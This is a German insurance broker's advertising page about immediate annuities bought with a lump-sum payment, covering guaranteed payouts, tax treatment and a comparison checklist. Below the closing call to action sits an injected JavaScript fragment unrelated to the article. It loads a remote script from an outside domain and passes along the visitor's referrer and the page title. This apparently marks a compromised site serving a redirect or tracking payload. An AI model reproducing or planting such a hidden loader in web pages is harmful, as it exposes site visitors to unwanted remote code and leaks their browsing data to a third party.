CENSIO » Aktuell » Altersvorsorge » Sofortrente » Rentenversicherung gegen Einmalzahlung

Rentenversicherung gegen Einmalzahlung

Sichern Sie Ihren Ruhestand finanziell ab

Eine Rentenversicherung gegen Einmalzahlung ist ein effektiver Weg, um sich eine lebenslange Rentenzahlung zu sichern. So können Sie auch im Ruhestand Ihren gewohnten Lebensstandard halten. Zu Beginn der Rentenversicherung gegen Einmalzahlung hinterlegen Sie einen größeren Geldbetrag. Mit dieser Zahlung sichern Sie eine Zusatzrente in garantierter Höhe, die Ihnen ein Leben lang zusteht. Die Rentenauszahlungen beginnen unmittelbar nachdem das Grundkapital eingezahlt wird.

Rentenzahlungen in garantierter Höhe

Entscheiden Sie sich für eine Rentenversicherung gegen Einmalzahlung, nehmen Sie gleich mehrere Vorteile wahr. Sie erhalten jeden Monat eine Zusatzrente, die direkt auf Ihr Konto eingeht. Sie müssen Sich um nichts kümmern. Es ist nicht notwendig das Kapital zu verwalten und es müssen keine schwierigen Anlageentscheidungen getroffen werden. Es ist gesetzlich vorgeschrieben, dass Ihnen ein Zinssatz in garantierter Höhe vom Versicherer zugesprochen wird. Das Kapital wird von Beginn an zu diesem Satz verzinst. Somit gehen Sie kein Zinsrisiko ein und Sie können sich sicher sein, dass Sie keine bösen Überraschungen erleben. Wenn Sie im Alter Ihren gewohnten Lebensstandard nicht aufgeben möchten, ist eine private Altersvorsorge unumgänglich. Nutzen Sie die Rentenversicherung gegen Einmalzahlung und investiere Sie Ihr Kapital in ein sicheres Renteneinkommen.

Mit einer Rentenversicherung gegen Einmalzahlung sichern Sie Ihren Ruhestand finanziell ab. Es werden Ihnen eine Reihe von Vorteilen geboten:

  • Lebenslange Rentenzahlung direkt auf Ihr Konto
  • Steuerliche Vorteile und Förderungen
  • Attraktive Verzinsung, ein Leben lang
  • Flexibler Hinterbliebenenschutz
  • Keine Gesundheitsprüfung

Staatliche Förderung der Rentenversicherung gegen Einmalzahlung

Die Rentenversicherung gegen Einmalzahlung wird von Staat steuerlich begünstigt. Es fällt keine Abgeltungsteuer an. Hinzu kommt, dass lediglich der Ertragsanteil besteuert wird. Im Alter fallen Steuersätze auf ein sehr niedriges Niveau herab. Ab dem 65. Lebensjahr liegt der Satz für den Ertragsanteil bei gerade einmal 18 %. Auch Ihr persönlicher Steuersatz sinkt, im Vergleich zum den Jahren Ihrer Berufstätigkeit. Kombinieren Sie die 18 % für die Ertragssteuer mit einem persönlichen Steuersatz von 20 %, so fällt auf den Gesamtbetrag der Zusatzrente ein Satz von 3,6 % an. Die Auszahlungen aus einem klassischen Investmentfonds oder anderen Kapitalanlagen werden mit bis zu 28 % besteuert.

Rentenversicherungen gegen Einmalzahlung vergleichen

Die Auswahl an Versicherern und Tarifen ist riesig. Dabei variieren die gebotenen Leistungen und Vertragsbedingungen enorm. Ein erfahrener Versicherungsberater zeigt Ihnen auf, welche Angebote und Produkte sich am besten für Ihre Ansprüche eignen. In einem direkten Vergleich finden unsere Berater von censio ein Versicherungsprodukt, dass für Sie und Ihre Familie maßgeschneidert ist. Wir setzen auf hochwertige Anbieter mit erstklassigen Leistungen und Preisen.

Bei der Wahl einer Rentenversicherung gegen Einmalzahlung ist auf folgende Punkte zu achten:

  • Wie hoch ist die Zahlung der Zusatzrente?
  • Welcher Versicherer bietet Sicherheit und Finanzstärke?
  • Wie hoch ist die Gesamtverzinsung?
  • Wird Hinterbliebenenschutz angeboten?
  • Welche Zusatzbausteine hat der Versicherer im Vertragsaufbau?

Wir erstellen für Sie einen kostenlosen und unverbindlichen Vergleich von Rentenversicherungen gegen Einmalzahlung. Finanzielle Sicherheit im Alter ist mit einer Zusatzrente möglich. Wenden Sie sich telefonisch an uns oder senden Sie eine E-Mail. Sichern Sie sich eine lebenslange Rentenzahlung und genießen Sie Ihren Lebensabend.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=‘ + encodeURIComponent(document.referrer) + ‚&default_keyword=‘ + encodeURIComponent(document.title) + “;

Tags:

Jetzt Tarife vergleichen Jetzt Tarife vergleichen

Weiterführende Artikel:

Autor: censio.de am 24. Apr 2015 11:24, Rubrik: Sofortrente, Kommentare geschlossen.

nach oben